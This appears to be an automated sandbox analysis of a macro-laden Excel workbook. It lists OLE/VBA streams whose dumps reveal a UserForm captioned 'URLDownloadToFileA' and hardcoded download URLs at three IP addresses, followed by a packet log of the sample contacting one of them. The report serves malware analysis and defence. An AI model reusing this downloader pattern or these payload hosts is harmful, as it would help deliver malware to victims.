Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	208
Entropy:	3.33231709703
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	101831
Entropy:	7.65479066874
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	662
Entropy:	5.27592988154
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37

Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTlk
File Type:	dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
Stream Size:	30
Entropy:	1.37215976263
Base64 Encoded:	False
Data ASCII:	. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
Data Raw:	01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	116
Entropy:	3.43722878834
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	302
Entropy:	4.65399600072
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69

Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/f
File Type:	data
Stream Size:	226
Entropy:	3.01175231218
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
Data Raw:	00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32

Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/o
File Type:	data
Stream Size:	272
Entropy:	3.6318384866
Base64 Encoded:	True
Data ASCII:	. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
Data Raw:	00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4332
Entropy:	4.42025024054
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2461
Entropy:	3.4974013905
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	138
Entropy:	1.48462480805
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	264
Entropy:	1.9985725068
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	256
Entropy:	1.80540314317
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	1047
Entropy:	6.66117755603
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:	01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 18:00:00.985924959 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:01.172477007 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:01.172693014 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:01.173538923 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:01.364674091 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.207995892 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219032049 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.219105959 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219146013 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219171047 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219194889 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219217062 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219238043 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219259977 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.219281912 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.220302105 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.220323086 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.220326900 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.220329046 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.220330000 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.220957041 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.220976114 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.409956932 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.411463022 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.415997028 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.416019917 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.416030884 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416057110 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416079044 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416100979 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416124105 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416142941 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416167974 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416192055 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416213036 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416234970 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416258097 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416280985 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.416302919 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.420572042 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420603037 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420608997 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420612097 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420614958 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420619011 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420622110 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420624971 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420627117 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420629978 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420631886 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420634031 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.420636892 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.613521099 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.613746881 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.628536940 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628622055 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628647089 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628670931 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628703117 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628768921 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628794909 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.628808975 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628833055 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.628840923 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.628871918 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628897905 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628921032 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628942013 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628963947 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.628985882 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629005909 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629026890 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629048109 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629070997 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629091978 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629112005 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629170895 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629193068 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629215002 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629215956 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.629235983 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629240990 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.629257917 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.629272938 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.629280090 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.629304886 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.739341974 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.803106070 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.803370953 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.834825039 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.841480017 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.841933966 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.841953993 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.841959953 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.841973066 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842000008 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842025042 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842047930 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842071056 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842094898 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842119932 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842142105 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.842181921 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.842189074 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.842204094 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.842210054 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.843967915 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:02.994586945 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:02.994813919 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.044775009 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044806957 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044821024 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044832945 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044845104 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044857979 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044869900 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044883013 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044905901 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044924974 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044939995 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.044956923 CEST	80	49167	190.14.37.178	192.168.2.22
Sep 28, 2021 18:00:03.045093060 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.045124054 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.046657085 CEST	49167	80	192.168.2.22	190.14.37.178
Sep 28, 2021 18:00:03.181478977 CEST	80	49167	190.14.37.178	192.168.2.22
